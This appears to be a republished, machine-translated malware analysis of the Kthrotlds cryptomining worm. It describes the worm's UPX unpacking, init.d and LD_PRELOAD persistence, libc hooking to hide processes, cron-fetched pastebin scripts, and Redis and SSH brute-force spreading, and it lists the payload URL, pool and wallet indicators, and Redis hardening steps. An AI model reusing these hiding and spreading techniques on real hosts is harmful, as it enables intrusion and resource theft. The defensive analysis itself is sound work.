Shulou(Shulou.com)06/02 Report--

This article analyzes "how to analyze Kthrotlds mining virus". The content is detailed and easy to understand. Friends who are interested in "how to analyze Kthrotlds mining virus" can follow the editor's train of thought to read it slowly and deeply. I hope it will be helpful to you after reading. Let's follow the editor to learn more about "how to analyze Kthrotlds mining virus".

On March 1, 2019, the Meran Technology Emergency response Center received a call for help from a partner, and the host was infected by a virus. Zheng Sidun, a security researcher of Moan Technology, found that the virus was a variant of the previous watchdogs and was broken through through Redis unauthorized access vulnerabilities and ssh weak passwords, and then released the mining Trojan horse for mining operations, and carried out redis vulnerability attacks and ssh brute force attacks on the internal and external network hosts.

Characteristics of 0x1 virus

To determine whether you are infected with this virus, you can start from the following aspects:

1. Check whether the key information in root/.ssh/ is cleared.

2. Check whether the following task information exists in the scheduled task

3. Check to see if the following process information is available

4. Check whether there is a kthrotlds file in the / usr/sbin directory

5. Check whether there is a netdns file under / etc/init.d/

6. Virus programs will consume a lot of host cpu resources after execution.

7. Check whether the libcset.so file exists under / usr/local/lib/

Please system maintenance personnel to check whether their machines have the above characteristics, if they have the above characteristics, you can contact the Meran Technology Security Emergency response Center for virus removal tools.

The following is the process of analyzing the virus:

0x2's analysis of kthrotlds:

Through the analysis, it is found that the virus file still uses the upx shell, but the number of demons in it has been modified:

The number of demons in the virus file

Just modify the module, as follows:

After repair, use upx-d to remove the shell

It can be seen that the shell has been successfully removed.

Let's use ida for decompilation

The function names are all random strings. If you look at the string, the inference program should be written in golang, which is similar to the previous one.

So here we still need to use the previous symbol restore script to restore the symbols in the program, and the script address is:

Https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro

After restore:

Let's start by analyzing the main function

0x1 writes kthrotlds's daemon netdns to / etc/init.d/ and sets netdns to boot

0x2 removes residual information from previous versions of the virus

0x3 compiles libcset.c and sets it to preload dynamic link libraries

0x4 writes scheduled tasks and remotely downloads mining files

0x5 starts the ksoftirqds process for mining operation

0x6 deletes files such as ksoftirqds,kthrotlds,config.json,.lsdpid under tmp

0x7 updates virus programs

0x8 redis unauthorized attacks and ssh brute force cracking attacks

Here is the copy of kthrotlds / tmp/kthrotlds to / usr/sbin/kthrotlds through the github_com_hippies_LSD_LSDC_CopyFile function. Then write a file called netdns to / etc/init.d/ and add netdns as the startup item through the chkconfig command.

You can find that the netdns file does exist in the etc/init.d directory.

Open the file through the text viewer and find that it is a bash script, as follows:

It roughly means to look at the list of processes, and if you find that the process kthrotlds has been dropped by kill, start it.

Let's go back to the analysis of kthrolds source code:

This is followed by some cleanup operations, which should be to clean up some files left over from previous versions:

Then write the licset.c file to / usr/local/lib, compile it into a / usr/local/lib/licset.so file, and set the so file to preload the dynamic link library.

The specific analysis of libcset.so in the second half of the article, let's continue to analyze the main function.

Next comes the write operation of the scheduled task, the release of the mining Trojan ksoftirqds, and the update operation.

The following are the commands written in its scheduled task:

Visit: https://pastebin.com/raw/D8E71JBJ to get virus execution script

By decrypting the base64-encoded data:

It is found that it is not much different from the previous script. Here, the image file obtained by curl is renamed to kthrotlds (originally watchdogs).

To learn more about the content of the script, please refer to the previous analysis article, which will not be analyzed too much here:

Https://www.anquanke.com/post/id/171692

0x3 lateral propagation

Let's take a look at how the virus spreads horizontally:

Readis attack

Traverse the private network ip and public network ip to attack the redis server:

Redis attacks captured by wireshark on the test machine

Main_main- > main_attack- > github_com_hippies_LSD_LSDA_Ago- > github_com_hippies_LSD_LSDA_Ago_func1- > github_com_hippies_LSD_LSDA_runtwo- > github_com_hippies_LSD_LSDA_run- > github_com_gomodule_redigo_redis_DiaTimeout- > github_com_gomodule_redigo_redis_Dial- > github_com_gomodule_redigo_redis__conn_Do- > github_com_gomodule_redigo_redis__conn_DoWithTimeout- > github_com_gomodule_redigo_redis__conn_writeCommand

Related codes:

Ssh blasting

Test the ssh blasting behavior captured by wireshark on the test machine:

Attacking program calling procedure

Main_main- > main_attack- > github_com_hippies_LSD_LSDA_Bbgo- > github_com_hippies_LSD_LSDA_bgo_func1- > github_com_hippies_LSD_LSDA_cmdtwo- > github_com_hippies_LSD_LSDA_cmd- > Golang_org_x_crpyto_ssh_Client_NewSession

Related code

Here is the entrance to the attack program (main_attack). There are two main attack modules, one is ssh blasting, and the other is redis unauthorized attack, just like the previous version.

0x4's Analysis of ksoftirqds

Let's take a look at the ksoftirqds file.

Through the analysis, it is found that the mining system xmr-stak is still used.

The address of the project is:

Https://github.com/fireice-uk/xmr-stak

The address of the mining pool is found through string retrieval, and it is found that the mining pool has changed.

The address of the mining pool here is:

Sg.minexmr.com:5555

Follow further to find the address of his wallet.

The id of its wallet is:

47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA

The following is the income of the wallet account

0x5's Analysis of libcset.c

In kthrotlds, libcset.c is compiled, and the compiled / usr/local/lib/libcset.so is set to preload the dynamic link library.

The following is a list of functions for libcset.c

It is obvious that the virus hides the information related to the virus by means of functions in hook libc.so.

Such as readdir function

Here, we hook the readdir function, check the process name (virus process name, kthrotlds), virus configuration file name, and dynamic link library name (libcset.so), and hide the information contained in the query results. Other functions will not be analyzed too much here.

0x6 analysis and summary

1. Compared with the previous watchdogs, its shell scheme has not changed much, but some modifications have been made to the reinforcement of the virus program, that is, the magic number of the original upx shell has been changed to: 4c53 4421. The corresponding response is to restore it to 55 50 58 21 before shelling.

2. Ssh blasting and redis attacks are carried out to spread the virus horizontally and expand the power of the mining botnet.

3. Monitor the / bin file directory through inotify and find that it does not delete the netstat command, which is one of the differences with watchdogs.

4. Ksofttirqds program mainly uses xmr-stak mining program to mine Monroe coins.

5. Compile libcset.c and set libcset.so to preload dynamic link libraries to hide virus correlation.

6. The previous version set the watchdog program as the boot startup item, while the current version wrote a script called netdns to set it as the boot startup item and act as the kthrotlds daemon.

7. Mine pool and wallet address:

Ore pool: sg.minexmr.com:5555

Wallet address:

47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA

8. Domain name: https://pastebin.com (unchanged)

Corresponding ip:104.20.209.21 (unchanged)

9. Related Md5 features:

Suggestions for da7ee5683fb870bae61e9c4088a661e466613e2e4210dce89b562635b769bc2183e651497c59a14ca8d5abab855659554c62c53ae69d8e9290aaccb5ee694716f1bdc8b12f2ef0279cd265c79bd6fd9ec7560dd3933774185ce19ddbee5e526c0x6 reinforcement

Virus programs may be implanted by exploiting unauthorized vulnerabilities in redis, so please reinforce redis.

Introduction to Redis unauthorized vulnerability: Redis binds the service to 0.0.0.0 6379 under the default configuration, that is, it is exposed on the public network. If the relevant authentication is not opened at the same time, it will cause any user to access the redis service, carry out database operations, and through further use, can also obtain system permissions.

Here are some reinforcement recommendations for redis:

1. The redis configuration file will be modified to bind the service to native 127.0.0.1.

two。 Modify redis.conf, set access authentication, and enable password authentication.

3. Specify the ip that can access the redis service at the firewall.

4. Modify the redis default port.

5. Disable the config directive to prevent malicious operations, which makes it more difficult for an attacker to use the config directive, even if there is unauthorized access.

6. Run the redis service with normal privileges, so that even if the attacker gains server privileges, it is only ordinary user privileges.

Measures for disposal of 0x7 virus

1) Moan Technology has developed an automatic cleaning script for the virus, the script address:

Https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool

3) it is recommended to use appropriate tools to troubleshoot Redis unauthorized access vulnerabilities and strengthen the security of servers across the network to avoid infection from the source.

4) in case of emergency, in order to avoid mass spread of the intranet, the infected machine can be temporarily disconnected and isolated.

5) if the business is not affected, it is recommended to delete the .ssh / known_hosts and login key files on the machine temporarily.

On how to carry out Kthrotlds mining virus analysis is shared here, I hope that the above content can make you improve. If you want to learn more knowledge, please pay more attention to the editor's updates. Thank you for following the website!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.